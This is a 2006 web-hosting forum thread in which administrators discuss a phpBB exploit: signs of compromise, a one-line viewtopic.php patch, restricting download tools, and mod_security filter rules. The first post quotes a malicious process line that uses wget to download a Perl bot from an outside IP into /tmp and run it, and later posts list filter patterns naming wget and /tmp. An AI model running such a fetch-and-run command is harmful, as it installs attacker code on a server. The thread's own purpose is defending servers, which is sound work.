The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Howto prevent hacker use your resources thu PhpBB ?

Discussion in 'General Discussion' started by jameshsi, Jul 4, 2006.

  1. jameshsi

    jameshsi Well-Known Member

    Joined:
    Oct 22, 2001
    Messages:
    347
    Likes Received:
    0
    Trophy Points:
    16
    Hi!
    I am not pro on this, but it seems there is no thread mention about how to update your phpbb scripts on your server , so I write down what I have known to solve this problem.

    First, if you are not sure if your server has been hacked, go to /tmp , and see if there is some .xxx files, please note, in my experience, it always something like ".xyz", for example : ".sosweet" , or you can do this:
    ps ax |more
    If you see some process you feel strange or odd, in my cases, like usbd, or like this:
    Code:
    sh -c wget http://66.90.71.157/~darkcube/linuxdaybot.txt -O /tmp/.sosweet2; perl /tmp/.sosweet2; touch /tmp/.sosweet3
    
    Then, you better check if your server has some phpbb running, and check their version.
    How to do that, please check some other thread, what I want to say here, is how to modify the phpbb script so you can prevent this shit happen again.

    Now, under the phpbb installed directory, find " viewtopic.php " , and edit it, find this line:
    Code:
    $words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight'])))); 
    and replace it to :
    Code:
    $words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight']))); 
    That's it, you are almost done.
    Then , go to /tmp and delete those hackers' files, and restart something.
     
  2. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,446
    Likes Received:
    195
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    You forgot one step.

    Remove phpbb and find a better forum. :eek:
     
  3. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Indeed. Patching something that is terminally broken is pointless. You should either upgrade to the very latest version (though the past has shown that only helps for a few weeks) or do as Infopro says, look for something that's been coded better.
     
  4. jameshsi

    jameshsi Well-Known Member

    Joined:
    Oct 22, 2001
    Messages:
    347
    Likes Received:
    0
    Trophy Points:
    16
    Hi!
    Yes,you guys are right, but also wrong.
    For long term, one should upgrade or transfer to other forum system, that's right, but for people like me, we have to deal with hacker right this moment, and no time for study how to immergrated to another forum, you have to fix the current hole.
     
  5. sitekeeper

    sitekeeper Well-Known Member

    Joined:
    Aug 13, 2001
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Troy, Mo
    I think the point chirpy was trying to make is that you will always be "fixing the current hole"
    You need to buy VB or Invision Power Board, or you could always lease Invision Power Board for $69.95 or VB for $85. It would be well worh your time..
     
  6. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    You need to limit access to your system binaries which would have avoided the exploit in the first place. For example:

    Lock access to common tools like:
    ftp,wget, get, lynx, fetch, curl, and others like compilers.
     
  7. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Mod Security.

    There is no substitute.

    http://www.hostmerit.com/modsec.rules.conf

    That's my widely used self coded mod security rules.

    Also for rubbish bots like this:

    SecFilter "linuxday"
    SecFilter "\/tmp"
    SecFilter "wget"
    SecFilter "lynx\x20"
    SecFilter "GET\x20"
    SecFilter "sosweet"
     
  8. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    That URL gives the following only:

    hif


    I think the URL you meant was: http://www.hostmerit.com/modsec.user.conf ;)

    Anyways setting up mod_security is a must but there are ways around it if you don't match the rule, so it's a very good idea to limit access to important binaries that can do harm.
     
    #8 ramprage, Jul 5, 2006
    Last edited: Jul 5, 2006
  9. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Also, mod_security is security through obscurity to some extent. It's a good tool for detecting vulnerabilities, but you really should not purely rely on it as a shield. It's much much better to get rid of the offending shoddy scripts rather than trying to protect them.
     
  10. mher

    mher Well-Known Member

    Joined:
    Jun 14, 2004
    Messages:
    49
    Likes Received:
    0
    Trophy Points:
    6
    i tried using the ruleset for mod_security but it seems WHM will not allow long rulsets. How can i fix this?
     
  11. NightStorm

    NightStorm Well-Known Member

    Joined:
    Jul 28, 2003
    Messages:
    286
    Likes Received:
    4
    Trophy Points:
    18
    cPanel Access Level:
    Root Administrator
    Twitter:
    Manually edit /usr/local/apache/conf/modsec.user.conf
     
  12. mike25

    mike25 Well-Known Member

    Joined:
    Aug 29, 2003
    Messages:
    83
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Raleigh NC, USA
    Nice ruleset, that puts mine to shame. Thanks Kris.
     
  13. docenta

    docenta Well-Known Member

    Joined:
    May 9, 2006
    Messages:
    64
    Likes Received:
    0
    Trophy Points:
    6
    hello is this mod_sec rules from hostmerit - tested and good ? I am using now the security rules from theplanet web site. which one is better/tested ?



    thanks.
     
  14. avijit

    avijit Well-Known Member

    Joined:
    Jul 26, 2004
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    India
    This mod_sec rulesets definitely looks good and seems to work well.
     
  15. jameshsi

    jameshsi Well-Known Member

    Joined:
    Oct 22, 2001
    Messages:
    347
    Likes Received:
    0
    Trophy Points:
    16
Loading...

Share This Page